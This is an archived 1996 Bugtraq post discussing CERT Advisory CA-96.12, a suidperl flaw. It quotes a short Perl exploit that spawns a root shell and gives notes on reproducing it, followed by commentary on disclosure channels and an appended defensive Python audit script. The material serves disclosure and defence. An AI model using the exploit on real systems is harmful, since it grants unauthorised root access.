Bugtraq mailing list archives
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
From: rob () brasaap iaehv nl (Rob J. Nauta)
Date: Sun, 30 Jun 1996 11:54:01 +0200
On Fri, 28 Jun 1996 ichudov () algebra com wrote:

What is the exploit?

Run this as a suid or sgid script. It doesn't matter what user or group it's suid/sgid to...it gets root access.

    #!/usr/bin/perl
    $ENV{PATH}="/bin:/usr/bin";
    $>=0;$<=0;
    exec("/bin/bash");

I think it's not entirely correct. I was able to reproduce the bug with #!/usr/bin/suidperl -U as the first line. You need the -U or else suidperl will complain about an insecure function being used. I also used system("/usr/bin/id"); which is more obvious to verify whether the bug exists.
Is it just me...or does it give people the willies knowing such an easy to exploit hole was on their systems...perhaps for years.
Certainly! I mean, I first heard about this via the CERT advisory while I am on most security lists. I guess via the PERL newsgroups/mailing lists there was an earlier alert, which the bad guys could've gotten, a bad one for all security folks! Nothing on bugtraq or the -alert lists, I guess many sites could have gotten hacked by people reading PERL news. This just shows

1) CERT alerts aren't that bad, by reading it I reproduced an exploit in minutes
2) security lists aren't everything, don't rely on them too much
3) the usenet security newsgroups are just entertainment and have no useful purpose for discussing new bugs, just general 'what is a firewall?' questions
4) bugtraq doesn't really meet its 'full disclosure' charter, nobody who knew the bug bothered to send in an exploit.

I checked an internet provider and they had a new suidperl with a date of June 2nd which was a safe one. I guess they have better sources than me, which is always a disappointment.

Rob
--
From the keyboard of Rob J. Nauta
rob () nauta it
rjn () pobox com
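
For administrators checking their own hosts for the condition discussed in this thread, the following is an added example, not part of the original post: a Python audit that flags set-uid/set-gid Perl scripts, shebang lines that pass -U, and set-id Perl interpreter binaries. The function names and the `sperl*` name pattern are assumptions made for the example.

```python
import os
import re
import stat

SETID = stat.S_ISUID | stat.S_ISGID
# Basenames treated as Perl interpreters: perl, suidperl and versioned sperl*
# builds (the sperl* pattern is an assumption about local naming).
PERL_NAME = re.compile(r"^(perl|suidperl|sperl)[\d._]*$")

def classify(mode, name, first_line):
    """Findings for one file, given its st_mode, basename and first line (bytes)."""
    findings = []
    if not stat.S_ISREG(mode) or not mode & SETID:
        return findings  # only set-id regular files are of interest
    bits = "+".join(b for b, m in (("suid", stat.S_ISUID), ("sgid", stat.S_ISGID)) if mode & m)
    if not first_line.startswith(b"#!"):
        if PERL_NAME.match(name):
            findings.append(f"{bits} perl interpreter binary")
        return findings
    parts = first_line[2:].decode("latin-1").split()
    if parts and PERL_NAME.match(os.path.basename(parts[0])):
        findings.append(f"{bits} perl script")
        # -U tells Perl to allow unsafe operations; the post notes the
        # reproduction needed it to get past suidperl's complaint.
        if any(re.match(r"^-[A-Za-z]*U", p) for p in parts[1:]):
            findings.append("shebang passes -U")
    return findings

def scan(root):
    """Walk root and return {path: findings} for every flagged file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
                if not stat.S_ISREG(mode) or not mode & SETID:
                    continue
                with open(path, "rb") as fh:
                    first = fh.readline(256)
            except OSError:
                continue  # unreadable or vanished file: skip it
            found = classify(mode, name, first)
            if found:
                report[path] = found
    return report

if __name__ == "__main__":
    for path, found in sorted(scan("/usr").items()):
        print(path, "->", ", ".join(found))
```

Run it as root so that unreadable set-id files are not silently skipped; each reported file should then be checked against the vendor's fixed suidperl or have its set-id bit removed.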